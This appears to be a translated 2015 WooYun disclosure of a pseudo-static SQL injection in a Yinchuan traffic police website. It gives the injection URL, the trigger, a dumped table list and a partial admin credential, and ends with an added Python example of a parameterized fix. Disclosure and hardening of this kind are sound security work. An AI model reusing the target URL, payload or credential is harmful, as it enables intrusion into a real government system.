
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0138826

Title: Pseudo-static SQL injection in the Yinchuan Municipal Public Security Bureau Traffic Police Branch website

Affected vendor: Yinchuan Municipal Public Security Bureau

Author: 尊-折戟

Submitted: 2015-09-03 18:16

Fix time: 2015-09-08 18:18

Public disclosure: 2015-09-08 18:18

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: Handed over to a third-party partner organization (First Research Institute of the Ministry of Public Security) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-03: Details sent to the vendor, awaiting vendor handling
2015-09-08: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says!

Detailed description:

Injection point:

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21

Appending a single * to the parameter is enough to trigger a database error. The request used:

http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21*

Database and administrator privileges:

current database:    'ycpolice'


[15:24:29] [INFO] resumed: yin_yanhuo
Database: ycpolice
[54 tables]
+------------------+
| yin_about |
| yin_actions |
| yin_address |
| yin_admin |
| yin_ajcheck |
| yin_baopozy |
| yin_bendisfz |
| yin_cardopen |
| yin_chenshibp |
| yin_chujinsi |
| yin_company |
| yin_complain |
| yin_config |
| yin_constable |
| yin_customer |
| yin_daxinhd |
| yin_department |
| yin_fenip |
| yin_findman |
| yin_gangaodj |
| yin_gknews |
| yin_gknewsclass |
| yin_guideclass |
| yin_jsxinxi |
| yin_jubao |
| yin_liuyan |
| yin_maps |
| yin_member |
| yin_message |
| yin_mycar |
| yin_news |
| yin_node |
| yin_photos |
| yin_pthuzhao |
| yin_reconsider |
| yin_renzhengma |
| yin_role |
| yin_showask |
| yin_suggestion |
| yin_user |
| yin_userguide |
| yin_waidisfz |
| yin_wanglaitw |
| yin_xinserver10 |
| yin_xinserver102 |
| yin_xinserver12 |
| yin_xinserver13 |
| yin_xinserver5 |
| yin_xinserver6 |
| yin_xinserver81 |
| yin_xinserver82 |
| yin_xinserver9 |
| yin_xinzhenfy |
| yin_yanhuo |
+------------------+


Time-based blind injection is very slow..... so I only dumped the main parts!

Obtained the administrator usernames and password hashes. Getting this far took almost 2 hours; there are many more rows, but I stopped here.

The dump was too slow, so only the first few entries are listed; among them is admin/dc6915681.
That's it..

Proof of vulnerability:

Database and administrator privileges: [screenshots, the same ones referenced in the detailed description]

Remediation:

Filter special characters!
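The report's remediation is character filtering; the fix a practitioner would actually apply to a pseudo-static route like /index.php/Index/showlist/Class_ID/21 is to validate the path segment as an integer and bind it as a query parameter. The following is an added example by the editor, not code from the report or from the affected site; the table name, columns and sample rows are constructed, and the SQLite backend stands in for the site's real database.

```python
import re
import sqlite3


def make_db():
    """Constructed sample schema standing in for the site's database
    (table and column names are assumptions, not from the report)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER, Class_ID INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?, ?)",
                     [(1, 21, "notice A"), (2, 21, "notice B"), (3, 22, "notice C")])
    return conn


def class_id_from_path(path):
    """Return the raw segment following 'Class_ID' in a pseudo-static path
    such as /index.php/Index/showlist/Class_ID/21, or None if absent."""
    parts = path.strip("/").split("/")
    for i, seg in enumerate(parts[:-1]):
        if seg == "Class_ID":
            return parts[i + 1]
    return None


def showlist_vulnerable(conn, path):
    """The pattern the report describes: the path segment is concatenated
    into the SQL text, so '21*' becomes 'WHERE Class_ID=21*' and the
    database raises a syntax error (the error the reporter observed)."""
    cid = class_id_from_path(path)
    sql = "SELECT title FROM news WHERE Class_ID=" + cid + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def showlist_hardened(conn, path):
    """Validate the segment as a plain integer, then bind it as a parameter;
    anything else is rejected before any SQL is built."""
    cid = class_id_from_path(path)
    if cid is None or not re.fullmatch(r"[0-9]{1,9}", cid):
        raise ValueError("Class_ID must be a positive integer")
    sql = "SELECT title FROM news WHERE Class_ID=? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (int(cid),))]


def run(handler, conn, path):
    """Return ('ok', rows) or ('error', exception class name) for a request."""
    try:
        return ("ok", handler(conn, path))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)
```

With the integer check in place the malformed request never reaches the database, so there is no error message for an attacker to learn from and no time-based channel to extract table contents through.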

Copyright notice: please credit the source when reposting 尊-折戟@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-09-08 18:18

Vendor reply:

Latest status:

None yet